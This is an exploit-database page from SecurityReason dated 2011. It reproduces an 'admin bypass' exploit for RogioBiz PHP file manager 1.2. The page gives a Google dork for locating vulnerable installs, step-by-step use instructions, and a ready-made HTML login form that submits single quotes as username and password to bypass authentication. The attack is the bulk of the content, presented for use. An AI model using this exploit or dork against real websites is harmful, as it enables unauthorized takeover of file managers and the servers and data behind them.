|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : ItSecTeam SecurityRisk : High  (About) Remote : Yes Local : No Status : Bug
Text : #########################bypass admin exploit################# Author: ItSecTeam download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.z ip script:RogioBiz_PHP_file_manager_V1.2 dork:inurl:"/rbfminc/" ----------------------------------------- use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.) </html> </style></head> <h2>coded by ahmadbady</h2> <body><br /><br /><br /><br /> <div class="login"> <div style="color:red" align="center"></div> <form id="login_form" name="login_form" method="post" action="/path/file_manager.php"> <table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px"> <tr> <td align="right">Username:</td> <td><input type="text" name="username" id="username" value="'" </tr> <tr> <td align="right">Password:</td> <td><input type="password" name="password" id="password" value="'" </td> </tr> <tr> <td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login »" /></td> </tr> </table> <input name="login" type="hidden" value="login" /> </form> </div> </body> </html> ######################## discovered by ahmadbady ######################## Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |